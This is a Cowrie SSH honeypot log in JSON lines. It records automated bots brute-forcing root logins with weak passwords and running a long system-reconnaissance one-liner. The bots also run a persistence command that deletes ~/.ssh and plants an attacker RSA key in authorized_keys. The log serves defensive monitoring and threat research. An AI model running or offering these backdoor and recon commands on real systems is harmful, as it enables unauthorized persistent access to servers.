{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32850,"dst_ip":"1.2.3.4","dst_port":22,"session":"01b43387570d","protocol":"ssh","message":"New connection: 212.227.235.229:32850 (1.2.3.4:22) [session: 01b43387570d]","sensor":"my-vps","timestamp":"2025-09-08T12:52:32.551090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:52:32.556067Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:52:32.695505Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:52:32.853166Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:52:33.308752Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.309476Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.310294Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.311515Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.312601Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.313353Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.314093Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.315386Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.315835Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.316533Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.317026Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.317597Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.318149Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.808105Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.808974Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:33.809821Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.login.success","username":"root","password":"Hello1234","message":"login attempt [root/Hello1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:52:34.049511Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:52:34.712662Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:52:34.713453Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:52:34.714292Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:35.016753Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:52:35.630261Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:52:35.630981Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:52:35.934633Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:35.935574Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34188,"dst_ip":"1.2.3.4","dst_port":22,"session":"60519a1246f4","protocol":"ssh","message":"New connection: 212.227.235.229:34188 (1.2.3.4:22) [session: 60519a1246f4]","sensor":"my-vps","timestamp":"2025-09-08T12:52:36.219625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:52:36.221768Z","src_ip":"212.227.235.229","session":"60519a1246f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:52:36.514939Z","src_ip":"212.227.235.229","session":"60519a1246f4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:52:37.682513Z","src_ip":"212.227.235.229","session":"60519a1246f4"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:38.978088Z","src_ip":"212.227.235.229","session":"60519a1246f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35448,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bedc59c5917","protocol":"ssh","message":"New connection: 212.227.235.229:35448 (1.2.3.4:22) [session: 7bedc59c5917]","sensor":"my-vps","timestamp":"2025-09-08T12:52:39.280502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:52:39.281421Z","src_ip":"212.227.235.229","session":"7bedc59c5917"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:52:39.579837Z","src_ip":"212.227.235.229","session":"7bedc59c5917"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:52:40.812074Z","src_ip":"212.227.235.229","session":"7bedc59c5917"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:41.113692Z","src_ip":"212.227.235.229","session":"01b43387570d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:41.114733Z","src_ip":"212.227.235.229","session":"7bedc59c5917"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50134,"dst_ip":"1.2.3.4","dst_port":22,"session":"293e600f175b","protocol":"ssh","message":"New connection: 212.227.235.229:50134 (1.2.3.4:22) [session: 293e600f175b]","sensor":"my-vps","timestamp":"2025-09-08T12:52:42.869310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:52:42.870238Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:52:43.221230Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.login.success","username":"root","password":"siemens123","message":"login attempt [root/siemens123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:52:44.669203Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:52:45.427518Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:52:45.428280Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:52:45.429332Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:45.779881Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:52:46.548407Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:52:46.549197Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:52:46.882192Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:46.883130Z","src_ip":"212.227.235.229","session":"293e600f175b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34504,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3c6972691df","protocol":"ssh","message":"New connection: 212.227.235.229:34504 (1.2.3.4:22) [session: a3c6972691df]","sensor":"my-vps","timestamp":"2025-09-08T12:52:47.198963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:52:47.199769Z","src_ip":"212.227.235.229","session":"a3c6972691df"}
